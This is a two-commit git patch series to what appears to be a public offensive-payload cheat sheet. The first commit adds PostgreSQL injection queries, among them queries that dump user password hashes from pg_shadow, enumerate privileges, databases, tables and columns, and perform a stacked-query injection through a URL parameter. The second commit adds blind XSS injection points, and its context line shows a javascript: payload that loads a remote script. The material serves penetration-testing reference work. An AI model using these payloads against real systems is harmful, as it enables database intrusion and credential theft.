From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001
From: nizam0906 <nizamudheenak8@gmail.com>
Date: Mon, 28 Oct 2019 16:26:49 +0530
Subject: [PATCH 1/2] Added more PostgreSQL Injection Queries

* PostgreSQL version
* PostgreSQL Current User
* PostgreSQL List Users
* PostgreSQL List Password Hashes
* PostgreSQL List Privileges
* PostgreSQL database name
* PostgreSQL List databases
* PostgreSQL List tables
* PostgreSQL List columns
* PostgreSQL Stacked query
---
 SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++
 1 file changed, 76 insertions(+)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index b8d962d..d923c5a 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -3,9 +3,19 @@
 ## Summary
 
 * [PostgreSQL Comments](#postgresql-comments)
+* [PostgreSQL version](#postgresql-version)
+* [PostgreSQL Current User](#postgresql-current-user)
+* [PostgreSQL List Users](#postgresql-list-users)
+* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
+* [PostgreSQL List Privileges](#postgresql-list-privileges)
+* [PostgreSQL database name](#postgresql-database-name)
+* [PostgreSQL List databases](#postgresql-list-database)
+* [PostgreSQL List tables](#postgresql-list-tables)
+* [PostgreSQL List columns](#postgresql-list-columns)
 * [PostgreSQL Error Based](#postgresql-error-based)
 * [PostgreSQL Blind](#postgresql-blind)
 * [PostgreSQL Time Based](#postgresql-time-based)
+* [PostgreSQL Stacked query](#postgresql-stacked-query)
 * [PostgreSQL File Read](#postgresql-file-read)
 * [PostgreSQL File Write](#postgresql-file-write)
 * [PostgreSQL Command execution](#postgresql-command-execution)
@@ -20,6 +30,64 @@
 /**/  
 ```
 
+## PostgreSQL Version
+
+```sql
+SELECT version()
+```
+
+## PostgreSQL Current User	
+
+```sql
+SELECT user;
+SELECT current_user;
+SELECT session_user;
+SELECT usename FROM pg_user;
+SELECT getpgusername();
+```
+
+## PostgreSQL List Users
+
+```sql
+SELECT usename FROM pg_user
+```
+
+## PostgreSQL List Password Hashes
+
+```sql
+SELECT usename, passwd FROM pg_shadow 
+```
+
+## PostgreSQL List Privileges
+
+```sql
+SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
+```
+
+## PostgreSQL Database Name
+
+```sql
+SELECT current_database()
+```
+
+## PostgreSQL List Database
+
+```sql
+SELECT datname FROM pg_database
+```
+
+## PostgreSQL List Tables
+
+```sql
+SELECT table_name FROM information_schema.tables
+```
+
+## PostgreSQL List Columns
+
+```sql
+SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
+```
+
 ## PostgreSQL Error Based
 
 ```sql
@@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
 AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 ```
 
+## PostgreSQL Stacked Query
+
+Use a semi-colon ";" to add another query
+
+```sql
+http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
+```
+
 ## PostgreSQL File Read
 
 ```sql

From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001
From: nizam0906 <nizamudheenak8@gmail.com>
Date: Mon, 28 Oct 2019 16:51:36 +0530
Subject: [PATCH 2/2] Updated Blind XSS endpoint

* User Agent
* Comment Box
---
 XSS Injection/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index a0ccd8a..f8cac69 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - Referer Header
   - Custom Site Analytics
   - Administrative Panel logs
+- User Agent
+  - Custom Site Analytics
+  - Administrative Panel logs
+- Comment Box
+  - Administrative Panel
+
 
 ## Polyglot XSS